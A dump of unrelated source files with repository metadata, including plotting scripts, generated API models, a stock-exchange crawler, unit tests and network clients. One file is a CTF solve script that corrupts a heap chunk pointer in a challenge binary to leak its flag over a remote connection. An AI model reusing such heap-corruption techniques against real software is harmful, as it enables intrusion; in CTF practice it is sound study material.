if show_path:
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel(u'$\\tau$') # we already handled the x-label with ax1
N_path = len(pathss_x[-1])
beta_plot = np.linspace(0,beta,N_path+1)
path_plot = list(pathss_x[-1])
path_plot.append(pathss_x[-1][0])
lns4 = ax2.plot(path_plot, beta_plot,'o-',c='k',label=u'Path')
ax2.tick_params(axis='y')
beta_ticks = np.linspace(0,beta,N_beta_ticks)
ax2.set_yticks(beta_ticks)
ax2.set_yticklabels(u'$%.2f$'%b for b in beta_ticks)
ax2.set_ylim(bottom=0)
ax2.set_xlim(-x_max,x_max)
# Solution for having legends that share two different scales
leg = lns1 + lns2 + [lns3[2][0]] + lns4
labs = [l.get_label() for l in leg]
ax1.legend(leg, labs, loc='best',title=u'$\\beta=%.2f$'%beta, fontsize=12)
fig.tight_layout() # otherwise the right y-label is slightly clipped
if save_plot:
plt.savefig(script_dir+'/'+file_name+'-path_true.eps')
if show_plot:
plt.show()
plt.close()
return 0
N_path = 10
beta = 4.
N_iter = int(1e4)
delta = 0.5
potential, potential_string = harmonic_potential, 'harmonic_potential'
append_every = 1
pathss_x = path_naive_sampling(N_iter=int(1e4))
#script_dir = os.path.dirname(os.path.abspath(__file__)) #path completa para este script
msq_file = 'pi_x-ms-harmonic_potential-x_max_5.000-nx_201-N_iter_7-beta_fin_4.000.csv'
N_plot = 201
x_max = 3
x_plot = np.linspace(-x_max,x_max,N_plot)
plot_file_name = 'pi_x-pi-plot-%s-x_max_%.3f-N_path_%d-N_iter_%d-beta_fin_%.3f'\
%(potential_string,x_max,N_path,N_iter,beta)
figures_fn( pathss_x, beta = beta , N_plot = N_plot, x_max = x_max, N_iter=N_iter,
N_beta_ticks = N_path+1, msq_file=msq_file, file_name=plot_file_name,
show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=False) | [
"jeaz.git@gmail.com"
] | jeaz.git@gmail.com |
4d1fefe592c0fe8d3fc87942e60245cf88efc8b1 | 596e92d0d484b6e7eee6d322e72e52748fdeaa5d | /sportsdata/nba_odds/models/__init__.py | 3deb348f2b98ad8e2c5f92f17542ca97f21454ec | [] | no_license | scottypate/sportsdata | f5f61ddc7eb482883f93737c6ce73dd814ed4336 | a07955ab50bf4fff1ce114ed9895095ff770c473 | refs/heads/main | 2023-08-18T16:51:56.452678 | 2021-10-22T12:44:08 | 2021-10-22T12:44:08 | 420,062,350 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,951 | py | # coding: utf-8
# flake8: noqa
"""
NBA v3 Odds
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from sportsdata.nba_odds.models.nba_odds_betting_entity_metadata import NbaOddsBettingEntityMetadata
from sportsdata.nba_odds.models.nba_odds_betting_event import NbaOddsBettingEvent
from sportsdata.nba_odds.models.nba_odds_betting_market import NbaOddsBettingMarket
from sportsdata.nba_odds.models.nba_odds_betting_market_result import NbaOddsBettingMarketResult
from sportsdata.nba_odds.models.nba_odds_betting_market_split import NbaOddsBettingMarketSplit
from sportsdata.nba_odds.models.nba_odds_betting_outcome import NbaOddsBettingOutcome
from sportsdata.nba_odds.models.nba_odds_betting_outcome_result import NbaOddsBettingOutcomeResult
from sportsdata.nba_odds.models.nba_odds_betting_split import NbaOddsBettingSplit
from sportsdata.nba_odds.models.nba_odds_consensus_outcome import NbaOddsConsensusOutcome
from sportsdata.nba_odds.models.nba_odds_game import NbaOddsGame
from sportsdata.nba_odds.models.nba_odds_game_betting_split import NbaOddsGameBettingSplit
from sportsdata.nba_odds.models.nba_odds_game_info import NbaOddsGameInfo
from sportsdata.nba_odds.models.nba_odds_game_odd import NbaOddsGameOdd
from sportsdata.nba_odds.models.nba_odds_matchup_trends import NbaOddsMatchupTrends
from sportsdata.nba_odds.models.nba_odds_player_prop import NbaOddsPlayerProp
from sportsdata.nba_odds.models.nba_odds_quarter import NbaOddsQuarter
from sportsdata.nba_odds.models.nba_odds_sportsbook import NbaOddsSportsbook
from sportsdata.nba_odds.models.nba_odds_team_game_trends import NbaOddsTeamGameTrends
from sportsdata.nba_odds.models.nba_odds_team_trends import NbaOddsTeamTrends
| [
"scotty.pate@auth0.com"
] | scotty.pate@auth0.com |
ec00fa8dbeafca6163d5777781721771db5178fe | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/sz_IPO_crawler_20210125145435.py | 2568a261c5c7c16de47a6b2efa3fab2001615b19 | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,992 | py | import requests
import re
import json
import pickle
import os
import random
import time
from urllib.parse import urlencode
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',}
# 'Accept': '*/*',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9',
# 'Connection': 'keep-alive',
# 'Host': 'listing.szse.cn'}
def index_getter(projtype):
if projtype == 'ipo':
biztype = 1
elif projtype == 'refinance':
biztype = 2
elif projtype == 'reproperty':
biztype = 3
else:
print("Input error! Please choose the correct type of data")
return
params = {'bizType':biztype, 'random':random.random(),'pageIndex':0,'pageSize':1000}
base_url = 'http://listing.szse.cn/api/ras/projectrends/query?'
projList_url = base_url + urlencode(params)
r = requests.get(projList_url,headers=headers)
index_list = json.loads(r.text)
save_obj(index_list['data'], os.getcwd()+'/'+'sz_index'+'_'+projtype+'.pkl')
return index_list['data']
def data_getter(prjid):
base_url = 'http://listing.szse.cn/api/ras/projectrends/details?id='
stock_url = base_url + prjid
r = requests.get(stock_url,headers=headers)
stockInfo = json.loads(r.text)['data']
base_path = os.getcwd() + '/data/'
directory = base_path + '/' + stockInfo['biztyp'] + '/' + stockInfo['cmpnm']
if not os.path.exists(directory):
os.makedirs(directory)
save_obj(stockInfo,directory+'/'+'sz_info.pkl')
return stockInfo
def file_getter(stockInfo):
base_path = os.getcwd()
directory = base_path + '/' + +stockInfo['cmpnm']
if not os.path.exists(directory):
os.makedirs(directory)
response = stockInfo['enquiryResponseAttachment']
disclosure = stockInfo['disclosureMaterials']
base_url = 'http://reportdocs.static.szse.cn'
for prj in disclosure:
filePath = prj['dfpth']
filename = directory + '\\'+ prj['dfnm']
download_url = base_url + filePath
time.sleep(random.randint(1, 3))
r = requests.get(download_url,headers=headers)
with open(filename,'wb') as f:
f.write(r.content)
def save_obj(obj, directory):
with open(directory + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(directory ):
with open( directory + '.pkl', 'rb') as f:
return pickle.load(f)
if __name__ == '__main__':
proj_list = index_getter()
# print('there are total {} stocks in the list'.format(len(proj_list)))
# i=0
# for proj in proj_list:
# i+=1
# print('fetching number project {},{}'.format(i,proj['cmpsnm']))
# prjid = proj['prjid']
# stockInfo = data_getter(str(prjid))
# # file_getter(stockInfo)
# time.sleep(random.randint(2,5))
# print('Update completed!!!!') | [
"chenjiajun.jason@outlook.com"
] | chenjiajun.jason@outlook.com |
fdc9fd8f92918ca6771e9e0ad94abfe344f6114c | 23d962a8e36b4a58e63e15f3c61a88b537a80f6e | /test/unit/mongo_class/server_is_locked.py | d7861bb5324cd04455a669a9b1e26c6234b271a3 | [
"MIT"
] | permissive | deepcoder42/mongo-lib | 3a893d38edb3e03decff0cfbcbf29339026909f9 | fa2b65587ab88ee90c9d85f12dd642c6295e0d94 | refs/heads/master | 2023-06-14T10:10:12.032877 | 2021-07-13T15:22:17 | 2021-07-13T15:22:17 | 337,179,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,875 | py | #!/usr/bin/python
# Classification (U)
"""Program: server_is_locked.py
Description: Unit testing of Server.is_locked in mongo_class.py.
Usage:
test/unit/mongo_class/server_is_locked.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
# Local
sys.path.append(os.getcwd())
import mongo_class
import version
__version__ = version.__version__
class Conn(object):
"""Class: Conn
Description: Class stub holder for Rep class.
Methods:
__init__
"""
def __init__(self):
"""Function: __init__
Description: Stub holder for Rep.conn.is_locked attribute.
Arguments:
"""
self.is_locked = True
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_is_locked
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.name = "Mongo_Server"
self.user = "mongo_user"
self.japd = "mongo_pd"
self.host = "host_server"
self.port = 27017
self.dbs = "test"
self.coll = None
self.db_auth = None
self.repset = "mongo_repset"
self.nodes = ["node1", "node2"]
def test_is_locked(self):
"""Function: test_is_locked
Description: Test is_locked method.
Arguments:
"""
mongo = mongo_class.Rep(self.name, self.user, self.japd, self.host,
self.port)
mongo.conn = Conn()
self.assertEqual(mongo.is_locked(), True)
if __name__ == "__main__":
unittest.main()
| [
"deepcoder42@gmail.com"
] | deepcoder42@gmail.com |
667e8cbd9f81dcd1adcb4e66abeaed066ae757ba | fa6204d88a35af62357cfd5091217cbc2087b779 | /blogclient/api/client.py | 223c1abb037c9629adcc026bad8833da7d542f4a | [] | no_license | StephenTao/python-blogclient | 9acaa25e2a4e2bc1a29b02791d6338ee41a91c5b | 6543668f8db6f83751be42464cb4065472972388 | refs/heads/master | 2021-01-10T15:46:34.529878 | 2016-02-25T07:30:16 | 2016-02-25T07:30:16 | 52,505,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,681 | py | # Copyright 2013 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from blogclient.api.v1 import client as client_v1
def client(blog_url=None, username=None, api_key=None,
project_name=None, auth_url=None, project_id=None,
endpoint_type='publicURL', service_type='workflow',
auth_token=None, user_id=None, cacert=None):
if blog_url and not isinstance(blog_url, six.string_types):
raise RuntimeError('Blog url should be a string.')
if not blog_url:
blog_url = "http://localhost:8989/v1"
return client_v1.Client(
blog_url=blog_url,
username=username,
api_key=api_key,
project_name=project_name,
auth_url=auth_url,
project_id=project_id,
endpoint_type=endpoint_type,
service_type=service_type,
auth_token=auth_token,
user_id=user_id,
cacert=cacert
)
def determine_client_version(blog_url):
if blog_url.find("v1") != -1:
return 1
raise RuntimeError("Can not determine blog API version")
| [
"stephenhuang@augmentum.com.cn"
] | stephenhuang@augmentum.com.cn |
8b5451e8e262b8fb4e784eb42c74bd0c64603b5a | 6160586aa239eada16e735d40d57970dedbe1dfc | /case/user_manage/user_info/test_user_query_info_byauthcode.py | 149975f8bde64ddd7f75f83bf84f12cfe3838b33 | [] | no_license | showgea/AIOT | 7f9ffcd49da54836714b3342232cdba330d11e6c | fe8275aba1c4b5402c7c2c2987509c0ecf49f330 | refs/heads/master | 2020-07-23T10:19:37.478456 | 2019-09-23T12:25:59 | 2019-09-23T12:25:59 | 207,525,184 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,773 | py | import unittest
import json
from modules.user_manage.user_info.user_query_info_byauthcode import *
from common.get_result_db import get_common_code
account_mail_Gary = readcfg.account_mail_Gary
account_wrong = readcfg.account_wrong
userId = readcfg.userId_Gary
authCode = readcfg.authCode_wrong
class TestUserQueryInfoByAuthCode(unittest.TestCase):
"""
根据验证码及账号获取用户基本信息
"""
@classmethod
def setUpClass(cls):
cls.authCode_email = get_common_code()
def test_user_query_info_byauthcode_01(self):
"""测试根据验证码及账号获取用户基本信息"""
result = user_query_info_byauthcode(account_mail_Gary, self.authCode_email)
# print(self.authCode_phone)
userId_api = json.loads(result.text)["result"]["userId"]
self.assertEqual(userId, userId_api, "查询接口返回userId:%s" % userId_api)
def test_user_query_info_byauthcode_02(self):
"""测试账号错误或不存在"""
result = user_query_info_byauthcode(account_wrong, authCode)
self.assertIn('"code":811', result.text)
def test_user_query_info_byauthcode_03(self):
"""测试账号为空"""
result = user_query_info_byauthcode("", authCode)
self.assertIn('"code":302', result.text)
def test_user_query_info_byauthcode_04(self):
"""测试验证码为空"""
result = user_query_info_byauthcode(account_mail_Gary, "")
self.assertIn('"code":302', result.text)
def test_user_query_info_byauthcode_05(self):
"""测试验证码错误"""
result = user_query_info_byauthcode(account_mail_Gary, authCode)
self.assertIn('"code":811', result.text)
if __name__ == '__main__':
unittest.main()
| [
"tangguobing2011@163.com"
] | tangguobing2011@163.com |
64f07b85e6b523f464618b624f7e189b7ea0b60c | a94b729855ba7239830952f0814cf19850ad123c | /voltha/adapters/adtran_olt/net/adtran_zmq.py | 9cbeae68c0f58b7ec726d9e9e3be522031eb87d9 | [
"Apache-2.0"
] | permissive | kthomas8/voltha | 37b1e69c1736ad780bf6233fd5272cfaab5bbfb9 | b5d1c18994de5c342ac97429c733b0b597df5690 | refs/heads/master | 2021-01-01T19:40:53.623682 | 2017-07-13T08:50:19 | 2017-07-27T17:42:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,310 | py | #
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import binascii
import struct
import structlog
from txzmq import ZmqEndpoint, ZmqFactory
from txzmq.connection import ZmqConnection
from zmq import constants
log = structlog.get_logger()
zmq_factory = ZmqFactory()
# An OMCI message minimally has a 32-bit PON index and 32-bit ONU ID.
_OLT_TASK_ZEROMQ_OMCI_TCP_PORT = 25656
class AdtranZmqClient(object):
"""
Adtran ZeroMQ Client for PON Agent packet in/out service
PON Agent expects and external PAIR socket with
"""
def __init__(self, ip_address, rx_callback=None,
port=_OLT_TASK_ZEROMQ_OMCI_TCP_PORT):
self.external_conn = 'tcp://{}:{}'.format(ip_address, port)
self.zmq_endpoint = ZmqEndpoint('connect', self.external_conn)
self.socket = ZmqPairConnection(zmq_factory,
self.zmq_endpoint)
self.socket.onReceive = rx_callback or AdtranZmqClient.rx_nop
def send(self, data):
try:
self.socket.send(data)
except Exception as e:
log.exception(e.message)
def shutdown(self):
self.socket.onReceive = AdtranZmqClient.rx_nop
self.socket.shutdown()
@staticmethod
def rx_nop(message):
log.debug('Discarding ZMQ message, no receiver specified')
@staticmethod
def encode_omci_message(msg, pon_index, onu_id):
"""
Create an OMCI Tx Packet for the specified ONU
:param msg: (str) OMCI message to send
:param pon_index: (unsigned int) PON Port index
:param onu_id: (unsigned int) ONU ID
:return: (bytes) octet string to send
"""
assert msg
# log.debug("Encoding OMCI: PON: {}, ONU: {}, Message: '{}'".
# format(pon_index, onu_id, msg))
s = struct.Struct('!II')
return s.pack(pon_index, onu_id) + binascii.unhexlify(msg)
@staticmethod
def decode_packet(packet):
"""
Decode the packet provided by the ZMQ client
:param packet: (bytes) Packet
:return: (long, long, bytes, boolean) PON Index, ONU ID, Frame Contents (OMCI or Ethernet),\
and a flag indicating if it is OMCI
"""
# TODO: For now, only OMCI supported
if isinstance(packet, list):
if len(packet) > 1:
pass # TODO: Can we get multiple packets?
return AdtranZmqClient._decode_omci_message(packet[0])
return -1, -1, None, False
@staticmethod
def _decode_omci_message(packet):
"""
Decode the packet provided by the ZMQ client
:param packet: (bytes) Packet
:return: (long, long, bytes) PON Index, ONU ID, OMCI Frame Contents
"""
(pon_index, onu_id) = struct.unpack_from('!II', packet)
omci_msg = packet[8:]
return pon_index, onu_id, omci_msg, True
@staticmethod
def _decode_packet_in_message(packet):
# TODO: This is not yet supported
(pon_index, onu_id) = struct.unpack_from('!II', packet)
msg = binascii.hexlify(packet[8:])
return pon_index, onu_id, msg, False
class ZmqPairConnection(ZmqConnection):
"""
Bidirectional messages to/from the socket.
Wrapper around ZeroMQ PUSH socket.
"""
socketType = constants.PAIR
def messageReceived(self, message):
"""
Called on incoming message from ZeroMQ.
:param message: message data
"""
self.onReceive(message)
def onReceive(self, message):
"""
Called on incoming message received from other end of the pair.
:param message: message data
"""
raise NotImplementedError(self)
| [
"knursimu@ciena.com"
] | knursimu@ciena.com |
6021a14840f4dfe5737a0e4cca506c1db90ac4e9 | d721258b53f0f44b1010cb8e8efac8e2a5c96c26 | /eamon/wsgi.py | b12308914222d44e2f8c86e1c45d9fd3a9fb0f6b | [
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | kdechant/eamon | a6662285f51a6cad5797bb9be92ca709ae36921c | 080a43aa80c3a1605c402e68616545a8e9c7975c | refs/heads/master | 2023-05-24T08:20:18.551604 | 2022-08-14T10:27:01 | 2023-04-08T07:31:45 | 49,559,304 | 28 | 7 | MIT | 2023-03-14T21:09:55 | 2016-01-13T08:07:28 | TypeScript | UTF-8 | Python | false | false | 561 | py | """
WSGI config for eamonproj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
import time
import traceback
import signal
import sys
from django.core.wsgi import get_wsgi_application
sys.path.append('/var/www/vhosts/eamon')
sys.path.append('/var/www/vhosts/eamon/venv/lib/python3.5/site-packages')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eamon.settings")
application = get_wsgi_application()
| [
"keith.dechant@gmail.com"
] | keith.dechant@gmail.com |
ab9d65909b79eb706fa5cf8aaf2e9c7dcf02f382 | 036a41c913b3a4e7ae265e22a672dd89302d3200 | /LOCF_剑指Offer/Offer10I/Offer10I_Python_1.py | 766252643cf67ffa677bc1c16c41cc875a9d4433 | [] | no_license | ChangxingJiang/LeetCode | e76f96ebda68d7ade53575354479cfc33ad4f627 | a2209206cdd7229dd33e416f611e71a984a8dd9e | refs/heads/master | 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | class Solution:
def fib(self, n: int) -> int:
if n == 0:
return 0
if n == 1:
return 1
a = 0
b = 1
for _ in range(n - 1):
a, b = b, a + b
return b % 1000000007
if __name__ == "__main__":
print(Solution().fib(2)) # 1
print(Solution().fib(5)) # 5
| [
"1278729001@qq.com"
] | 1278729001@qq.com |
dcbf41f5c810985b668d17f1de7878308645db71 | 0644c03cc3f89b0fc22d9e548a2d06e6a594f1b4 | /l10n_th_account_pit/wizard/print_wht_cert_wizard.py | a526a3939af6f823385ad6781a822ab337ec3e31 | [] | no_license | phongyanon/pb2_addons | 552fbf4cd904c81a1fd0ac5817dc1cf8f3377096 | 4c69002eeda2de8e806c8a168d8ba9f28527c8d2 | refs/heads/master | 2021-01-19T13:20:53.749866 | 2017-12-20T11:12:51 | 2017-12-20T11:12:51 | 97,184,424 | 0 | 0 | null | 2017-07-14T02:29:53 | 2017-07-14T02:29:52 | null | UTF-8 | Python | false | false | 1,638 | py | # -*- coding: utf-8 -*-
from openerp import models, fields, api
class PrintWhtCertWizard(models.TransientModel):
_inherit = 'print.wht.cert.wizard'
@api.model
def _prepare_wht_line(self, voucher):
wht_lines = []
if self._context.get('pit_withhold', False):
for line in voucher.pit_line:
vals = {
'pit_id': line.id,
'wht_cert_income_type': line.wht_cert_income_type,
'wht_cert_income_desc': line.wht_cert_income_desc,
'base': line.amount_income,
'amount': line.amount_wht,
}
wht_lines.append((0, 0, vals))
else:
wht_lines = super(PrintWhtCertWizard,
self)._prepare_wht_line(voucher)
return wht_lines
@api.model
def _save_selection(self):
if self._context.get('pit_withhold', False):
if not self.voucher_id.income_tax_form:
self.voucher_id.income_tax_form = self.income_tax_form
self.voucher_id.tax_payer = self.tax_payer
for line in self.wht_line:
line.pit_id.write({
'wht_cert_income_type': line.wht_cert_income_type,
'wht_cert_income_desc': line.wht_cert_income_desc,
})
else:
super(PrintWhtCertWizard, self)._save_selection()
class WhtCertTaxLine(models.TransientModel):
_inherit = 'wht.cert.tax.line'
pit_id = fields.Many2one(
'personal.income.tax',
string='PIT Line',
readonly=True,
)
| [
"kittiu@gmail.com"
] | kittiu@gmail.com |
dbd41fc82545780aec01e119160e4bf1141ad632 | 7fb95b0e0fbc9af63d002e8f589ec464f11b2dcf | /mozy/apps/mosaic/migrations/0005_auto_20150502_1437.py | 6e631a504f97df9ac28d2b5626e3d8a4e2368147 | [
"MIT"
] | permissive | pipermerriam/mozy | 2907656de8a724abb1f635235ba8d572cdc1a2c9 | 472d3dc77519aae8abd719819f07a929cfd53641 | refs/heads/master | 2023-08-28T09:41:43.696557 | 2015-05-03T10:39:46 | 2015-05-03T10:39:46 | 33,761,997 | 0 | 0 | null | 2015-04-23T18:40:44 | 2015-04-11T04:04:59 | Python | UTF-8 | Python | false | false | 633 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mosaic', '0004_auto_20150502_1351'),
]
operations = [
migrations.RemoveField(
model_name='normalizedsourceimage',
name='tile_size',
),
migrations.AlterField(
model_name='mosaicimage',
name='tile_size',
field=models.PositiveSmallIntegerField(default=40, choices=[(20, b'20 pixels'), (40, b'40 pixels'), (60, b'60 pixels'), (80, b'80 pixels')]),
),
]
| [
"piper@simpleenergy.com"
] | piper@simpleenergy.com |
f2a1af90f8f17139a5a61568bb00db96f91ff840 | b3aba10f1d40bf5dc2fd2bc86d7c8d17c02ad214 | /Python/InterfaceFolder/Interface.py | c96c5d964afabbf13d46c5cc5caeb7ad9978552d | [] | no_license | jjdblast/BigData | 2259d8dd6dc774e85c34c9fcb8ef845b099f0dbb | 442d330da61d3a1cd14a63421a345c1b0b0bd64a | refs/heads/master | 2020-12-31T05:10:05.291026 | 2016-07-28T09:47:01 | 2016-07-28T09:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | #coding:utf-8
'''
Created on 2016年6月2日
@author: giant
'''
def my_callback(input):
print "hellow world"
print "function my_callback was called with %s input" % (input,)
| [
"hsw.time@gmail.com"
] | hsw.time@gmail.com |
accd25f62f52cf65f8c258e2dcce607d5f25fb6f | 1db2e2238b4ef9c1b6ca3b99508693ee254d6904 | /develop/distribution_analysis/get_distribution.py | ed2a0fbe5958631f1fe4ab77686f8e4032248c97 | [] | no_license | pgreisen/pythonscripts | 8674e08095f76edf08ef2059300349218079724c | 0aadf8f96d19b306c1bc44a772e766a06fe3408b | refs/heads/master | 2021-07-06T23:54:57.774342 | 2021-06-08T19:36:36 | 2021-06-08T19:36:36 | 22,017,192 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py |
#!/usr/bin/env python
import os,shutil
from optparse import OptionParser
from pylab import *
from numpy import mean,median
def read_file(filename):
f = open(filename,'r')
number = [float(number.strip('\n')) for number in f.readlines() ]
f.close()
return number
def concatenate_lists(a,b):
c = a+b
return c
def main():
parser = OptionParser()
parser.add_option('-f',dest='datafile',
help='Datafile')
parser.add_option('-l',dest='list_of_datafiles',
help='List containing naming of data files')
parser.add_option('-c',dest='concatenate',
help='Should all the data be pooled together')
(options,args) = parser.parse_args()
# String of atom names from the ligand to be aligned with
# Set the path to the pdb file
datafile = options.datafile
list_of_datafiles = options.list_of_datafiles
total_data = []
concatenate = False
if(datafile != None):
datafile = read_file(datafile)
hist(datafile,100,normed=1)
savefig('histogram.png')
# Multiple disitrbution plot
elif(list_of_datafiles != None):
fl_list = open(list_of_datafiles,'r')
f = [f.strip('\n') for f in fl_list.readlines() ]
fl_list.close()
if(concatenate == True):
for ln in f:
datafile = read_file(ln)
total_data = concatenate_lists(total_data,datafile)
hist(total_data,100,normed=1)
savefig('histogram.png')
else:
dummy = 0
dataset = []
for ln in f:
dataset.append(read_file(ln))
print "The mean is ", round(mean(dataset[dummy]),3)
print "The median is ",round(median(dataset[dummy]),3)
hist(dataset[dummy],100,normed=1)
dummy = dummy + 1
savefig('mulitple_histogram.png')
if __name__ == "__main__":
main()
| [
"pgreisen@gmail.com"
] | pgreisen@gmail.com |
b28c119440b275211e9419c52249b7e15e69c698 | bc371b9238956bc00cc33654b1d68651c6edf371 | /writeups/2021/UMassCTF/suckless2/solve.py | 3630e3e60dbe0df2ab62d7d4bc19878c0b703861 | [
"MIT"
] | permissive | welchbj/ctf | 447202921fbf5c467af62b4f72f5f489c7c471f0 | 3b54769a8312f755eb97e7b4c954e4b5829af8e1 | refs/heads/master | 2023-08-19T03:28:33.264186 | 2023-08-11T18:38:17 | 2023-08-11T18:38:17 | 213,223,536 | 167 | 28 | MIT | 2023-04-18T13:29:33 | 2019-10-06T18:42:03 | Python | UTF-8 | Python | false | false | 1,313 | py | #!/usr/bin/env python3
from pwn import *
the_binary = "./suckless2_dist"
context.binary = the_binary
elf = context.binary
context.terminal = ["tmux", "splitw", "-h"]
def init_io():
if args.REMOTE:
io = remote("34.72.244.178", 8089)
elif args.STRACE:
io = process(["strace", "-o" ,"trace.txt", the_binary])
else:
io = process(the_binary)
if args.GDB:
gdb.attach(io, f"""
file {the_binary}
continue
""")
return io
class Const:
flag_base = 0x000000000042a3d0
def add(io, sz, content):
assert b"\n" not in content
io.sendlineafter("> ", "new")
io.sendlineafter("length: ", str(sz))
io.sendlineafter("note: ", content)
def leak_flag_part(offset):
io = init_io()
# Overwrite chunk next ptr for arbitrary write.
where = elf.sym.version
what = Const.flag_base + offset
add(io, 1, b"A"*0x10 + p64(where))
add(io, 1, b"X")
add(io, 1, p64(what))
io.sendlineafter("> ", "version")
io.recvuntil("this is ")
return io.recvuntil("\n", drop=True).decode()
def main():
flag = ""
flag_base = 0x000000000042a3d0
while "}" not in flag:
flag += leak_flag_part(offset=len(flag))
log.info(f"Flag: {flag}")
if __name__ == "__main__":
main()
| [
"welch18@vt.edu"
] | welch18@vt.edu |
9cf1edebac26b014d06bb74d8579bc2d35c8a658 | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/python_all/68_8.py | 8d459b58026c87bc4d0809ae531ada70dcad3ea6 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,806 | py | How to Get Coordinate Of Screen in Python Turtle ?
Turtle is a special feature in python which contains a graphical library. In
this article we will learn how to Get Coordinate Of Screen in Python Turtle.
Turtle has many built in function to create this program we use following.
> **import turtle – > **This is the python library which allow us to access
> turtle library.
>
> **Turtle()– >** This Method is used to make object.
>
> **onscreenclick(functionname,1) – > **This is turtle function which sends
> the coordinate to function; 1 is for left click and 3 is for Right click
>
>
>
>
>
>
>
> **speed()– > **This is used to increse or decrease the speed of turtle
> pointer.
>
> **listen()– > T**his allows the server to listen to incoming connections.
>
> **done()– > **This is used to hold the the screen.
## Python3
__
__
__
__
__
__
__
# turtle library
import turtle
#This to make turtle object
tess=turtle.Turtle()
# self defined function to print coordinate
def buttonclick(x,y):
print("You clicked at this coordinate({0},{1})".format(x,y))
#onscreen function to send coordinate
turtle.onscreenclick(buttonclick,1)
turtle.listen() # listen to incoming connections
turtle.speed(10) # set the speed
turtle.done() # hold the screen
---
__
__
### **Output:**

Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"qmnguyenw@gmail.com"
] | qmnguyenw@gmail.com |
9c32a0e4932286ee4c8d66addc4f77cfc63023fb | 919e3e3d772d6a79e7639bde32bf698088bc241f | /pyspider/result/result_worker.py | ddfd7545d8dc0fc20273f9cb2192499ca363bee4 | [
"Apache-2.0"
] | permissive | UoToGK/crawler-pyspider | 96cfee1e16db1376b5ea0c5fa51650a04c14f714 | 29ba13905c73081097df9ef646a5c8194eb024be | refs/heads/master | 2023-09-05T18:33:17.470385 | 2021-11-05T10:44:15 | 2021-11-05T10:44:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,619 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-10-19 15:37:46
import time
import json
import logging
from six.moves import queue as Queue
from pyspider.helper.logging import task_log
logger = logging.getLogger("result")
class ResultWorker(object):
"""
do with result
override this if needed.
"""
def __init__(self, resultdb, inqueue):
self.resultdb = resultdb
self.inqueue = inqueue
self._quit = False
def on_result(self, task, result):
task_log(task, 'on result')
'''Called every result'''
if not result:
return
if 'taskid' in task and 'project' in task and 'url' in task:
logger.info('result %s:%s %s -> %.30r' % (
task['project'], task['taskid'], task['url'], result))
return self.resultdb.save(
project=task['project'],
taskid=task['taskid'],
url=task['url'],
result=result
)
else:
